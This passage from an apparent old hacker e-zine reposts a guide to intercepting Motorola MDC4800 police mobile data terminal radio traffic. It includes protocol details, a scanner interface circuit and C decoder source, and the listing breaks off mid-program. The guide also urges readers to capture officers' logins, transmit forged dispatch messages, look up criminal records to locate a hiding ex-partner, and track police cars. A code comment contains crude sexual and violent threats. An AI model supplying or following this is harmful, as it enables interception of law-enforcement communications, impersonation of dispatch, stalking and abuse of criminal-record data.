  3959.      are among the members of the billionaire club whose Social Security numbers remain easily accessible through the SEC's
  3960.      EDGAR database. The Social Security numbers of Gates, Allen, and Moore were found on forms filed before the summer of 1997,
  3961.      but Waitt's number was accepted on a February 1998 filing, after the SEC changed its policy.
  3962.  
  3963.      Social Security numbers were created to track earnings and Social Security benefits. But the unique numbers are now used for
  3964.      much more, leading privacy organizations to argue that the SEC has a moral obligation to stop publishing them on the Net.
  3965.  
  3966.      "The SSN is the way that everybody's financial records are kept together," said Jodie Beebe, a spokesman for the Privacy Rights
  3967.      Clearinghouse.
  3968.  
  3969.      "If somebody gets a copy of your SSN, they can get utilities hooked up, rack up several credit cards, establish employment--and
  3970.      your credit report can be ruined," she added. "Identity theft can wreak havoc in your life."
  3971.  
  3972.      Microsoft would not comment about the exposure of Gates's Social Security number, though privacy concerns are nothing new to
  3973.      the company. The software giant and Intel--its chipmaking partner in the Wintel PC juggernaut--found themselves at the center of
  3974.      recent computer privacy concerns when it was revealed that their products could be used to track Net users' activities.
  3975.  
  3976.      In fact, anxiety over the increasing loss of privacy in the information age is at an all-time high, with many lawmakers and
  3977.      consumer advocates calling for industry and government to more closely guard personally identifiable information, which is
  3978.      solicited by Web sites, compiled by database creators or resold in digital format.
  3979.  
  3980.      The SEC is also worried about inadvertently playing a part in identity theft or other privacy breaches.
  3981.  
  3982.      "With the growth of the EDGAR database, and its availability to millions of viewers on the commission's Web site, the
  3983.      commission is concerned that these numbers are too readily available," the SEC stated in its June 1997 rule change. "The
  3984.      usefulness of Social Security numbers filers voluntarily provide on these forms is outweighed by the risk of misuse created by the
  3985.      disclosure of those numbers."
  3986.  
  3987.      Still, the SEC has no plans to remove documents from its online archive that include the numbers, spokesman John Heine said
  3988.      yesterday. "We can't alter those forms. They are a matter of public record," he said. 
  3989.      
  3990.      @HWA
  3991.      
  3992.  29.0 The Doghouse -- Motorola's MDC-4800 Police Data Terminal
  3993.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3994.       
  3995.       From Cryptogram 
  3996.       
  3997.       I'd grab this software before it becomes too well known and pulled from
  3998.       the site ... - Ed
  3999.       
  4000.        
  4001.       There's a Windows program that decodes the police car mobile data terminal
  4002.       transmissions.  If you thought listening in on police radio frequencies was
  4003.       interesting, you should see what comes over on those data transcripts.
  4004.        
  4005.        
  4006.       Motorola's "encryption" wasn't designed for privacy, it's more like a
  4007.       checksum for transmission integrity. Basically, it's XOR.
  4008.        
  4009.        
  4010.       The software is free, although there is this helpful notice on the Web
  4011.       site:  "Decoding MDT transmissions may be illegal in some countries, you
  4012.       may want to check the laws for your country before using this program."
  4013.        
  4014.        
  4015.       http://www.geocities.com/ResearchTriangle/Facility/7646/
  4016.       
  4017.       From the site;
  4018.       
  4019.       How to decode the MDC 4800 Protocol
  4020.       
  4021.       Greetings one and all,
  4022.  
  4023.      Have you ever lusted to decode Mobile Data Terminal (MDT)
  4024.        tranmissions? Have you ever wanted to see the same NCIC and motor
  4025.        vehicle information that law enforcement officers see? Have you ever
  4026.        wanted to see what officers send to each other over "private" channels?
  4027.        And all this with an interface you can build with only a few dollars
  4028.        worth of parts from your local radio shack?
  4029.        
  4030.             If so this posting might be your rendevous with destiny. The tail
  4031.        end of this posting includes the source code of a program that decodes
  4032.        and displays MDT messages. It stores roughly 30k of messages in a buffer
  4033.        and then writes the whole buffer to a file called "data.dat" before
  4034.        terminating. The program may be interrupted at any time by pressing any
  4035.        key (don't use control-c) at which point it writes the partially filled
  4036.        buffer to "data.dat". This program only works for systems built by
  4037.        Motorola using the MDC4800 tranmission protocol. This accounts for a
  4038.        large fraction of public service MDT systems as well other private
  4039.        systems.
  4040.        
  4041.             The existence of this program is ample evidence that Motorola has
  4042.        misrepresented its MDT systems when it marketed them as a secure means
  4043.        of communcications. The interested reader will soon discover that these
  4044.        systems do not use any form of encryption. Security concerns instead
  4045.        have been dealt with by using a code. "And what might this code be
  4046.        called?" asks the reader. The code turns out to be plain ASCII. What
  4047.        follows is a brief description of how the program and the MDC4800
  4048.        protocol work. If you don't understand something go to your local
  4049.        library and check out a telecommunications theory book.
  4050.        
  4051.             1. The raw transmission rate is 4800 baud. The program's interrupt
  4052.        service routine simply keeps track of the time between transitions. If
  4053.        you're receiving a perfect signal this will be some multiple of 1/4800
  4054.        seconds which would then give you how many bits were high or low. Since
  4055.        this is not the best of all possible worlds the program instead does the
  4056.        following: transitions are used to synchronize a bit clock. One only
  4057.        samples whenever this clock is in the middle of the bit to produce the
  4058.        raw data stream. This greatly reduces jitter effects.
  4059.        
  4060.             2. Whenever a tranmitter keys up the MDC4800 protocol calls for bit
  4061.         synchronization (a sequence of 1010101010101010....). In the program
  4062.         this will result in receive bit clock synchronization. There is no need
  4063.         to specifically look for the bit sync.
  4064.        
  4065.            3. Look for frame synchronization in raw bit stream so that data
  4066.        frames can be broken apart. Frame synchronization consists of a 40 bit
  4067.        sequence : 0000011100001001001010100100010001101111. If this sequence is
  4068.        detected (or 35 out of 40 bits match up in the program) the system is
  4069.        idling and the next 112 bit data block is ignored by the program. If the
  4070.        inverted frame sync is detected one immediately knows that 112 bit data
  4071.        blocks will follow.
  4072.        
  4073.            4. Receive the 112 bit data block and undo the bit interleave. This
  4074.        means that one must reorder the bits in the following sequence : {0,16,
  4075.        32,48,64,80,96,1,17,33,49,65,81,97,2,18,34,...} if the orignal sequence
  4076.        were received as {0,1,2,3,4,5,6,7,8,...}.
  4077.        
  4078.             5. Check the convolutional error correcting code and count the
  4079.        number of errors. The error correcting code is rate 1/2 which means we
  4080.        will be left with 56 data bytes. The encoder is constructed so that the
  4081.        output consists of the original data bits interspersed with error
  4082.        correcting code. The generating polynomial used is :
  4083.                         1 + X^-1 + X^-5 + X^-6
  4084.        Whenever an error is detected a counter is incremented. An attempt is
  4085.        made to correct some errors by finding the syndrome and looking for the
  4086.        bogus bit.
  4087.        
  4088.             6. Keep receiving 112 bit data blocks until either a new frame sync
  4089.        is found or two consecutive data blocks have an unacceptably large
  4090.        number of errors.
  4091.        
  4092.             7. Each data block consists of six data bytes; the last 8 bits are
  4093.        status bits that are simply ignored. The program shows the data in two
  4094.        columns - hexadecimal and ASCII. This data is kept in a buffer and is
  4095.        written to the file "data.dat" when the program terminates.
  4096.        
  4097.             8. What the program doesn't do: As a further check on the data
  4098.        there can be CRC checks. This varies from protocol to protocol so this
  4099.        program does not implement the CRC checks. Nonetheless, it is a
  4100.        relatively trivial matter to find the generating polynomial. The
  4101.        addresses, block counts, and message ID numbers are also quite easy to
  4102.        deduce.
  4103.        
  4104.        As you can see, there is no encryption. The bit interleave and the error
  4105.        correcting coding are there solely to insure the integrity of the ASCII
  4106.        data. Since any moron could have figured this stuff out from scratch one
  4107.        could argue that MDTs do not use "...modulation parameters intentionally
  4108.        witheld from the public". Therefore the Electronic Communications
  4109.        Privacy Act may not prohibit receiving MDT tranmissions. However,
  4110.        consult your attorney to make sure.
  4111.        
  4112.             The total disregard for security will no doubt annoy countless
  4113.        Motorola customers who were assured that their MDT systems were secure.
  4114.        Since Federal law states that NCIC information must be encrypted your
  4115.        local law enforcement agency might be forced to spend millions of
  4116.        dollars to upgrade to a secure MDT system - much to the delight of
  4117.        Motorola and its stockholders. Cynics might conclude that the release of
  4118.        a program like this is timed to coincide with the market saturation of
  4119.        existing MDT systems.
  4120.        
  4121.             Also, this program is completely free and it had better stay that
  4122.        way. What's to prevent you from adapting this into a kit and selling it
  4123.        from classified ads in the back of Nuts and Volts? Nothing. But take a
  4124.        look at Motorola's patents sometime. You'll notice that this program
  4125.        does things that are covered by a shitload of patents. So any attempt to
  4126.        take financial advantage of this situtation will result in utter misery.
  4127.        
  4128.        
  4129.        Please keep the following in mind: this program only works with the
  4130.        first serial port (COM1). If your mouse or modem is there too bad. If
  4131.        you don't like this rewrite the program.
  4132.        
  4133.        
  4134.        ------------------------------------------------------------------------
  4135.        What equipment do I need?
  4136.        
  4137.        RADIO SCANNER:
  4138.        
  4139.             A scanner that can receive 850-869 MHz. For those of you who don't
  4140.        know, this is the band where most business and public service trunked
  4141.        radio systems can be found along with the mobile data terminal
  4142.        transmissions. Chances are excellent that if your local authorities have
  4143.        a motorola trunked radio system and mobile data terminals that this is
  4144.        the frequency band in use. Very rarely will one find mobile data
  4145.        terminals in other frequency bands.
  4146.        
  4147.             Now for the fun part - your scanner should probably be modified to
  4148.        allow you to tap off directly from the discriminator output. If you wait
  4149.        until the signal has gone through the radio's internal audio filtering
  4150.        the waveform will likely be too heavily distorted to be decoded. This is
  4151.        exactly the same problem that our friends who like to decode pager
  4152.        transmissions run into - some of them have claimed they can only decode
  4153.        512 baud pager messages using the earphone output of their scanner.
  4154.        These mobile data terminal messages are 4800 baud so I don't think you
  4155.        have a snowball's chance in hell without using the discriminator output.
  4156.        If you don't know where to begin modifying your scanner you might want
  4157.        to ask those who monitor pagers how to get the discriminator output for
  4158.        your particular radio.
  4159.        
  4160.        
  4161.        COMPUTER/SCANNER INTERFACE
  4162.        
  4163.              Those of you who have already built your interface for decoding
  4164.        pager messages should be able to use that interface without any further
  4165.        ado. For those starting from scratch - you might want to check out
  4166.        packages intended for pager decoding such as PD203 and the interfaces
  4167.        they describe. The following excerpt gives an example of a decoder that
  4168.        should work just fine (lifted out of the PD203 POCSAG pager decoder
  4169.        shareware documentation):
  4170.        
  4171.        >
  4172.        >   0.1 uF                    |\ +12v
  4173.        > ---||-----------------------|- \|
  4174.        > AF IN    |                  |741 \
  4175.        > ----     |                  |    /--------------------- Data Out
  4176.        >     |    \            ------|+ /|  |                    CTS (pin 5/8)
  4177.        >     |    / 100K       |     |/-12v |                 or DSR (pin 6/6)
  4178.        >     |    \            |            |
  4179.        >    GND   /            ----/\/\/\----         GND ------ GND (pin 7/5)
  4180.        >          |            |    100K
  4181.        >          |            \                  N.B. Pin Numbers for com port are
  4182.        >         GND           /                  given as x/y, where x is for a 25
  4183.        >                       \  10K             way, y for a 9 way.
  4184.        >                       /
  4185.        >                       |
  4186.        >                      GND
  4187.        >
  4188.        
  4189.        
  4190.        
  4191.        This needs a mod - It is far to deaf as this. Remove the 10k resistor and
  4192.        replace it with a 470 ohm preset and 560 ohm fixed in series. Audio level is
  4193.        critical in the pd203 that he refers to ! - dg
  4194.        
  4195.        
  4196.        > The  above circuit is a Schmitt Trigger, having thresholds of about +/- 1v.
  4197.        
  4198.        balls - its nearer to 3 to 4 volts p-p! (dg)
  4199.        
  4200.        > If such a large threshold is not required, eg for a  discriminator  output,
  4201.        > then  the  level of positive feedback may be reduced by either reducing the
  4202.        > value of the 10K resistor or by increasing the value of the  100K  feedback
  4203.        > resistor.
  4204.        >
  4205.        > The +/- 12v for the op-amp can be derived from unused signals  on  the  COM
  4206.        > port (gives more like +/- 10v but works fine !):-
  4207.        >
  4208.        >
  4209.        >    TxD (2/3) --------------|<-------------------------------------- -12v
  4210.        >                                     |                  |
  4211.        >    RTS (4/7) --------------|<--------       GND        - -
  4212.        >                   |                          |         _ +  10uF
  4213.        >                    --------->|-------        - -       |
  4214.        >                    Diodes 1N4148    |        - + 10uF  GND
  4215.        >                                     |        |
  4216.        >    DTR (20/4) ------------->|-------------------------------------- +12v
  4217.        >
  4218.        
  4219.        If I were building this circuit I would strongly suggest tying the
  4220.        non-inverting (+) input of the op-amp to ground since you are working
  4221.        directly with the discriminator output and don't need a Schmitt trigger.
  4222.        All these parts or equivalents are easily available (even at your local
  4223.        Radio Shack which stocks the finest collection of components that have
  4224.        failed the manufacturer's quality control checks and supported by a
  4225.        sales staff that's always got the wrong answers to your questions).
  4226.        
  4227.        Also: DO NOT use the RI (ring indicator) as an input to the computer.
  4228.        
  4229.        -------------------------------------------------------------------------
  4230.        
  4231.        How do I check things?
  4232.        
  4233.             As a first step, I would get a package such as PD203 and use it to
  4234.        decode a few pages. If you can get that working you know that that your
  4235.        interface circuit is functioning correctly.
  4236.        
  4237.             If you are in a reasonably sized town you might be part of the
  4238.        ardis network. The ardis network is a nationwide commercial mobile data
  4239.        terminal network where one can send/receive E-mail messages from one's
  4240.        portable computer. It has been exclusively assigned the frequency of
  4241.        855.8375 MHz. Therefore, if you can hear digital bursts on this
  4242.        frequency you are basically guarranteed that these are MDC4800 type
  4243.        messages. You should be able to get stuff popping up on your screen
  4244.        although a lot of the messages will not be plain english.
  4245.        
  4246.             If your interface works but you can't seem to get any messages on
  4247.        the screen for a channel you know is a Motorola MDT system then it might
  4248.        be possible that your scanner/interface is putting out data with the
  4249.        polarity reversed. To check for this run the program with a command line
  4250.        arguement. When it runs you should an initial "Polarity reversed"
  4251.        message and hopefully then things will work out for you.
  4252.        
  4253.             Other than that: if this program doesn't work pester someone else
  4254.        who has got it working. Don't bother pestering the author(s) of this
  4255.        posting; the shit(s) aka "she/he/it (s)" are afraid of a thousand
  4256.        lawyers from Motorola descending like fleas to infest their pubic hair
  4257.        and accordingly have decided to remain forever anonymous. No doubt
  4258.        someone on the usenet who sees this post will know what to do with this
  4259.        program and also hopefully rewrite into a more user friendly form. When
  4260.        you do please don't forget to release the source code.
  4261.        
  4262.        -------------------------------------------------------------------------
  4263.        
  4264.        Future projects/nightmares you might want to think about:
  4265.        
  4266.             Certain MDT systems embed formatting information in the text in the
  4267.        form of ESC plus [ plus a few more bytes. Someone might want to decode
  4268.        these on the fly and format the output so it looks exactly the same way
  4269.        as the user sees it.
  4270.        
  4271.             Make it so that this program works with com ports other than COM1.
  4272.        
  4273.             Make it user friendly?
  4274.        
  4275.             Enlarge the data buffer from the current 30k.
  4276.        
  4277.             Give the output data file an unique name each time the program is
  4278.        run instead of "data.dat".
  4279.        
  4280.             How about sorting through the past traffic so that you only see
  4281.        traffic to a specified user?
  4282.        
  4283.             The program does not cut data blocks off in the display but it
  4284.        might add an extra one or two (which will display as all zeroes).
  4285.        Someone might want to make all those zeroes be shown as blanks instead.
  4286.        
  4287.             Write some real instructions.
  4288.        
  4289.        
  4290.        Now the more ambitous stuff:
  4291.        
  4292.             Are you half-way competent with RF engineering? Then listen in to
  4293.        the tranmissions from the mobile units back to the base station. That
  4294.        way you get everyone's password and user IDs as they log on to the MDT
  4295.        system. By this point you will no doubt have been able to figure out all
  4296.        of the appropriate communications protocols so you should think about
  4297.        getting your own transmitter up and running along with the necessary
  4298.        program modifications so that you can transmit MDT messages. The
  4299.        required transmitter can be very simple - for example, those masocists
  4300.        who want to start from scratch might want to special order an
  4301.        appropriate crystal (pulling the frequency with the computer's tranmit
  4302.        signal), building a frequency multiplier chain, and adding a one watt RF
  4303.        amplifier to top it all off (see the appropriate ARRL publications for
  4304.        more information on radio techniques). Now you can log in and look at
  4305.        the criminal records and motor vehicle information on anybody you can
  4306.        think of. Find out what your neigbors are hiding. Find out who that
  4307.        asshole was that cut you off downtown. Find out where your former
  4308.        girl/boy friend is trying to hide from you. And on and on...
  4309.             Those with simpler tastes might want to simply transmit at the base
  4310.        station's frequency to any nearby MDT terminal - now you too can
  4311.        dispatch your local law enforcement agencies at the touch of your
  4312.        fingers!!! See your tax dollars at work tearing apart every seam of your
  4313.        neighbor's house. Or create strife and dissension in your local law
  4314.        enforcement agency as more and more officers come out of the closet
  4315.        using their MDTs trying to pick up fellow officers.
  4316.        
  4317.             There are municipalities that have put GPS receivers on all of
  4318.        their vehicles. Should it happen that the information is sent back over
  4319.        one of these networks you could have your computer give you a real-time
  4320.        map showing the position of every vehicle and how far away they are from
  4321.        you.
  4322.        
  4323.             Extend your knowledge to other data networks. Here you will want to
  4324.        look at the RAM mobile data network. It uses the MOBITEX protocol which
  4325.        is really easy to find information on. Since it is an 8 kilobaud GMSK
  4326.        signal there is a decent chance that you can use the interface described
  4327.        here. This transmission mode demmands much more from your equipment than
  4328.        MDT tranmissions. At the very least you must be much more careful to
  4329.        make sure you have adequate low frequency response. Despite this it is
  4330.        possible to receive and decode MOBITEX transmissions with a simple
  4331.        op-amp circuit! This just goes to show you what drivelling bullshit
  4332.        RAM's homepage is filled with - they explain in great detail how hackers
  4333.        will never be able to intercept user's radio tranmissions (incidentally
  4334.        explaining how to decode their tranmissions). The necessary program will
  4335.        be the proverbial exercise left for the reader. For better performance
  4336.        buy a dedicated MOBITEX modem chip and hook it up to your computer.
  4337.        
  4338.        -----------------------------------------------------------------------
  4339.        
  4340.        A few words about the program:
  4341.        
  4342.             Remember - you must have your decoder hooked up to COM1. The RTS
  4343.        line will be positive and the DTR line negative but if you built the
  4344.        decoder with a bridge rectifier you really don't have to worry about
  4345.        their polarity. Stop the program by punching any key; don't use
  4346.        control-c or control-break!
  4347.        
  4348.             If you must reverse polarity run the program with any command line
  4349.        arguement (example: type in "mdt x" at the command line if your program
  4350.        is mdt.exe). You should then see the "Polarity Reversed." message pop up
  4351.        and hopefully things will then work.
  4352.        
  4353.             As far as compiling this - save the latter portion of this posting
  4354.        (the program listing) and feed it to a C compiler. Pretty much any C
  4355.        compiler from Borland should work. If you (Heaven Forbid) use a
  4356.        Microsoft C compiler you might need to rename some calls such as
  4357.        outport. Follow any special instructions for programs using their own
  4358.        interrupt service routines. This program is not object oriented. It also
  4359.        does not want anything whatsoever to do with Windows. Please don't even
  4360.        think about running this program under Windows. Finally, here it is:
  4361.        
  4362.        
  4363.        
  4364.        ---------------------- C u t   H e r e ! ! ! --------------------------
  4365.        
  4366.        /*  start of program listing */
  4367.        
  4368.        #include <stdio.h>
  4369.        #include <conio.h>
  4370.        #include <dos.h>
  4371.        #include <math.h>
  4372.        
  4373.        /* Purpose of program: receive messages using the Motorola MDC4800    */
  4374.        /* protocol and show them on the screen                               */
  4375.        /*                                                                    */
  4376.        /* WARNING TO ALL : This program is free. Please distribute and modify*/
  4377.        /* this program. I only request that you always include the source    */
  4378.        /* code so that others may also learn and add improvements. The       */
  4379.        /* status of this program at the time of the original release is :    */
  4380.        /* it doesn't have much in the way of a user interface or options but */
  4381.        /* it should work if you follow the procedure in the text file. Don't */
  4382.        /* expect any sort of support (you get what you pay for - nothing in  */
  4383.        /* this case). Finally, here's a special message to all of you who    */
  4384.        /* might have the urge to try to make money with this information:    */
  4385.        /* I know where you live. I will shave your pets and pour rubbing     */
  4386.        /* alcohol all over them (unless said pet happens to be a Rottweiler).*/
  4387.        /* I will have sex with your wife while you off at work; on the rare  */
  4388.        /* occasions when you have sex with your wife she will in the throes  */
  4389.        /* of passion cry not your name but mine. I will sell drugs to the    */
  4390.        /* demented spawn you refer to as your children. And if that's not    */
  4391.        /* enough for you let a thousand lawyers from motorola descend on you */
  4392.        /* and pound your fat rear end so far into the ground that it finally */
  4393.        /* sees daylight again somewhere in Australia.                        */
  4394.        /*                                                                    */
  4395.        /*                                                                    */
  4396.        /* General tidbits (a few of those "Why were things done this way     */
  4397.        /* questions).                                                        */
  4398.        /* 1. Why is captured data kept in an array and only written to a     */
  4399.        /* disk file at the very end? Because disk access seems unreliable    */
  4400.        /* when so much time is taken up by the background interrupt service  */
  4401.        /* routine.                                                           */
  4402.        /* 2. Why is the array storing this so small? Because yours truly was */
  4403.        /* too damn lazy to use a pointer and allocate a huge chunk of memory.*/
  4404.        /* (Hint for those of you who would like to improve this.             */
  4405.        /*--------------------------------------------------------------------*/
  4406.        
  4407.        /* global variables */
  4408.        int lc=0;
  4409.        char fob[30000];/* output buffer for captured data to be sent to disk */
  4410.        int foblen=29900;
  4411.        int fobp=0;     /* pointer to current position in array fob           */
  4412.        char ob[1000];  /* output buffer for packet before being sent to screen */
  4413.        int obp=0;      /* pointer to current position in array ob              */
  4414.        
  4415.        static unsigned int buflen= 15000;      /* length of data buffer      */
  4416.        static volatile unsigned int cpstn = 0; /* current position in buffer */
  4417.        static unsigned int fdata[15001] ;      /* frequency data array       */
  4418.        
  4419.        void interrupt (*oldfuncc) (); /* vector to old com port interrupt    */
  4420.        
  4421.        /**********************************************************************/
  4422.        /*                                this is serial com port interrupt   */
  4423.        /* we assume here that it only gets called when one of the status     */
  4424.        /* lines on the serial port changes (that's all you have hooked up).  */
  4425.        /* All this handler does is read the system timer (which increments   */
  4426.        /* every 840 nanoseconds) and stores it in the fdata array. The MSB   */
  4427.        /* is set to indicate whether the status line is zero. In this way    */
  4428.        /* the fdata array is continuously updated with the appropriate the   */
  4429.        /* length and polarity of each data pulse for further processing by   */
  4430.        /* the main program.                                                  */
  4431.        void interrupt com1int()
  4432.        {
  4433.          static unsigned int d1,d2,ltick,tick,dtick;
  4434.        
  4435.          /* the system timer is a 16 bit counter whose value counts down     */
  4436.          /* from 65535 to zero and repeats ad nauseum. For those who really  */
  4437.          /* care, every time the count reaches zero the system timer         */
  4438.          /* interrupt is called (remember that thing that gets called every  */
  4439.          /* 55 milliseconds and does housekeeping such as checking the       */
  4440.          /* keyboard.                                                        */
  4441.          outportb (0x43, 0x00);       /* latch counter until we read it      */
  4442.          d1 = inportb (0x40);         /* get low count                       */
  4443.          d2 = inportb (0x40);         /* get high count                      */
  4444.        
  4445.          /* get difference between current, last counter reading             */
  4446.          tick  = (d2 << 8) + d1;
  4447.          dtick = ltick - tick;
  4448.          ltick = tick;
  4449.        
  4450.          if ((inportb(0x3fe) & 0xF0) > 0) dtick = dtick ^ 0x8000;
  4451.                                      else dtick = dtick & 0x3fff;
  4452.        
  4453.          fdata[cpstn] = dtick;        /* put freq in fdata array             */
  4454.          cpstn  ++;                   /* increment data buffer pointer       */
  4455.          if (cpstn>buflen) cpstn=0;   /* make sure cpstn doesnt leave array  */
  4456.        
  4457.          d1 = inportb (0x03fa);       /* clear IIR                           */
  4458.          d1 = inportb (0x03fd);       /* clear LSR                           */
  4459.          d1 = inportb (0x03fe);       /* clear MSR                           */
  4460.          d1 = inportb (0x03f8);       /* clear RX                            */
  4461.          outportb (0x20, 0x20);       /* this is the END OF INTERRUPT SIGNAL */
  4462.                                       /* "... that's all folks!!!!"          */
  4463.        }
  4464.        
  4465.        void set8250 ()                /* sets up the 8250 UART               */
  4466.        {
  4467.          static unsigned int t;
  4468.          outportb (0x03fb, 0x00);     /*  set IER on 0x03f9                  */
  4469.          outportb (0x03f9, 0x08);     /*  enable MODEM STATUS INTERRUPT      */
  4470.          outportb (0x03fc, 0x0a);     /*  push up RTS, DOWN DTR              */
  4471.          t = inportb(0x03fd);         /*  clear LSR                          */
  4472.          t = inportb(0x03f8);         /*  clear RX                           */
  4473.          t = inportb(0x03fe);         /*  clear MSR                          */
  4474.          t = inportb(0x03fa);         /*  clear IID                          */
  4475.          t = inportb(0x03fa);         /*  clear IID - again to make sure     */
  4476.        }
  4477.        
  4478.        void set8253()                 /*  set up the 8253 timer chip         */
  4479.        {                              /* NOTE: ctr zero, the one we are using*/
  4480.                                       /*  is incremented every 840nSec, is   */
  4481.                                       /*  main system time keeper for dos    */
  4482.          outportb (0x43, 0x34);       /* set ctr 0 to mode 2, binary         */
  4483.          outportb (0x40, 0x00);       /* this gives us the max count         */
  4484.          outportb (0x40, 0x00);
  4485.        }
  4486.        
  4487.        /****************************************************************/
  4488.        
  4489.        int pork(int l)
  4490.        {
  4491.          static int s=0,sl=0x0000,t1,asp=0,ll,k,v,b,tap,synd=0,nsy;
  4492.          static char line[200]; /* array used to format 112 bit data chunks */
  4493.          static int lc=0;       /* pointer to position in array line        */
  4494.          if (l == -1)
  4495.          {
  4496.        /*    printf ("  %2i\n",asp); */
  4497.            sl = 0x0000;
  4498.            s = 0;
  4499.            synd = 0;
  4500.            if ((asp <12) && (lc > 50))
  4501.            {
  4502.              ll = 12 - asp;
  4503.              for (ll=0; ll<6; ll++)
  4504.              {
  4505.                v = 0;
  4506.                for (k=7; k>=0; k--)
  4507.                {
  4508.                  b = line[ (ll<<3) +k ];
  4509.                  v = v << 1;
  4510.                  if ( b == 49) v++;
  4511.                }
  4512.                ob[obp] = (char) v;
  4513.                if (obp < 999) obp++;
  4514.              }
  4515.            }
  4516.            lc = 0;
  4517.            tap = asp;
  4518.            asp = 0;
  4519.            return(tap);
  4520.          }
  4521.          else
  4522.          {
  4523.            s++;
  4524.            if (s==1)
  4525.            {
  4526.              line[lc] = (char) l;
  4527.              lc++;
  4528.            }
  4529.        
  4530.            /* update sliding buffer */
  4531.            sl = sl << 1;
  4532.            sl = sl & 0x7fff;
  4533.            if (l == 49) sl++;
  4534.        
  4535.            if (s >1)
  4536.            {
  4537.              s = 0;
  4538.        
  4539.              if ((sl & 0x2000) > 0) t1 = 1; else t1 = 0;
  4540.              if ((sl & 0x0800) > 0) t1^=1;
  4541.              if ((sl & 0x0020) > 0) t1^=1;
  4542.              if ((sl & 0x0002) > 0) t1^=1;
  4543.              if ((sl & 0x0001) > 0) t1^=1;
  4544.        
  4545.              /* attempt to identify, correct certain erroneous bits */
  4546.        
  4547.              synd = synd << 1;
  4548.              if (t1 == 0)
  4549.              {
  4550.                asp++;
  4551.                synd++;
  4552.              }
  4553.              nsy = 0;
  4554.              if ( (synd & 0x0001) > 0) nsy++;
  4555.              if ( (synd & 0x0004) > 0) nsy++;
  4556.              if ( (synd & 0x0020) > 0) nsy++;
  4557.              if ( (synd & 0x0040) > 0) nsy++;
  4558.              if ( nsy >= 3)  /* assume bit is correctable */
  4559.              {
  4560.                printf ("*");
  4561.                synd = synd ^ 0x65;
  4562.                line[lc - 7] ^= 0x01;   /**********************************************/
  4563.              }
  4564.        
  4565.        
  4566.            }
  4567.        
  4568.          }
  4569.          return(0);
  4570.        }
  4571.        
  4572.        void shob()
  4573.        {
  4574.          int i1,i2,j1,j2,k1;
  4575.        
  4576.          /* update file output buffer */
  4577.          i1 = obp / 18;
  4578.          if ( (obp-(i1*18)) > 0) i1++;
  4579.          fob[fobp] = (char) (i1 & 0xff);
  4580.          if (fobp < 29999) fobp++;
  4581.          for (i2 = obp; i2<=(obp+20); i2++) ob[i2] = 0;
  4582.          for (j1 = 0; j1 < i1; j1++)
  4583.          {
  4584.            for (j2 = 0; j2 < 18; j2++)
  4585.            {
  4586.              k1 = j2 + (j1*18);
  4587.              printf("%02X ", ob[k1] & 0xff);
  4588.              fob[fobp] = (char) (ob[k1] & 0xff);
  4589.              if (fobp < 29999) fobp++;
  4590.            }
  4591.            printf ("    ");
  4592.            for (j2 = 0; j2 < 18; j2++)
  4593.            {
  4594.              k1 = j2 + (j1*18);
  4595.              if (ob[k1] >=32) printf("%c",ob[k1]); else printf(".");
  4596.            }
  4597.            printf("\n");
  4598.          }
  4599.        
  4600.          obp=0;
  4601.          printf("BUFFER: %3i percent full\n",(int)(fobp/299.0));
  4602.        }
  4603.        
  4604.        /**********************************************************************/
  4605.        /*                      frame_sync                                    */
  4606.        /**********************************************************************/
  4607.        /* this routine recieves the raw bit stream and tries to decode it    */
  4608.        /* the first step is frame synchronization - a particular 40 bit      */
  4609.        /* long sequence indicates the start of each data frame. Data frames  */
  4610.        /* are always 112 bits long. After each 112 bit chunk this routine    */
  4611.        /* tries to see if the message is finished (assumption - it's finished*/
  4612.        /* if the 40 bit frame sync sequence is detected right after the end  */
  4613.        /* of the 112 bit data chunk). This routine also goes back to hunting */
  4614.        /* for the frame sync when the routine processing the 112 bit data    */
  4615.        /* chunk decides there are too many errors (transmitter stopped or    */
  4616.        /* bit detection routine skipped or gained an extra bit).             */
  4617.        /*                                                                    */
  4618.        /* inputs are fed to this routine one bit at a time                   */
  4619.        /* input : 48 - bit is a zero                                         */
  4620.        /*         49 - bit is a 1                                            */
  4621.        
  4622.        void frame_sync(char gin)
  4623.        {
  4624.          static unsigned int s1=0,s2=0,s3=0,nm,j,t1,t2,t3,ns=0,st=0,n,m,l,chu=0,eef=0;
  4625.          static char ta[200];
  4626.        
  4627.          if (st == 1)
  4628.          {
  4629.            ta[ns] = gin;
  4630.            ns++;
  4631.            if (ns >= 112)   /* process 112 bit chunk */
  4632.            {
  4633.              chu++;
  4634.              ns = 0;
  4635.              for (n= 0; n<16; n++)
  4636.              {
  4637.                for (m=0; m<7; m++)
  4638.                {
  4639.                  l = n + (m<<4);
  4640.                  pork(ta[l]);
  4641.                }
  4642.              }
  4643.              if (pork(-1) > 20) eef++; else eef=0;
  4644.              if (eef > 1)  /* if two consecutive excess error chunks - bye  */
  4645.              {
  4646.                st = 0;
  4647.                shob();
  4648.                eef = 0;
  4649.              }
  4650.        /*      else eef = 0; */
  4651.            }
  4652.          }
  4653.        
  4654.            /* s1,s2,s3 represent a 40 bit long buffer */
  4655.            s1 = (s1 << 1) & 0xff;
  4656.            if ((s2 & 0x8000) > 0) s1++;
  4657.            s2 = (s2 << 1);
  4658.            if ((s3 & 0x8000) > 0) s2++;
  4659.            s3 = (s3 << 1);
  4660.            if (gin == 49) s3++;
  4661.        
  4662.            /* xor with 40 bit long sync word */
  4663.            t1 = s1 ^ 0x0007;
  4664.            t2 = s2 ^ 0x092A;
  4665.            t3 = s3 ^ 0x446F;
  4666.        
  4667.            /* find how many bits match up */
  4668.            /* currently : the frame sync indicates system id / idling / whatever */
  4669.            /*        inverted frame sync indicates message follows             */
  4670.            nm = 0;
  4671.            for (j=0; j<16; j++)
  4672.            {
  4673.              if (t1 & 1) nm++;
  4674.              if (t2 & 1) nm++;
  4675.              if (t3 & 1) nm++;
  4676.              t1 = t1 >> 1;
  4677.              t2 = t2 >> 1;
  4678.              t3 = t3 >> 1;
  4679.            }
  4680.        
  4681.            if (nm <  5)
  4682.            {
  4683.              st = 1;
  4684.              ns = 0;
  4685.            }
  4686.            else if (nm > 35)
  4687.            {
  4688.              if (st==1)
  4689.              {
  4690.                shob();
  4691.              }
  4692.              st = 0;
  4693.              ns = 0;
  4694.            }
  4695.        }
  4696.        
  4697.        void main (int argc)
  4698.        {
  4699.          unsigned int n,i=0,j,k,l,cw1=49,cw0=48;
  4700.          FILE *out;
  4701.          char s=48;
  4702.          double pl,dt,exc=0.0,clk=0.0,xct;
  4703.        
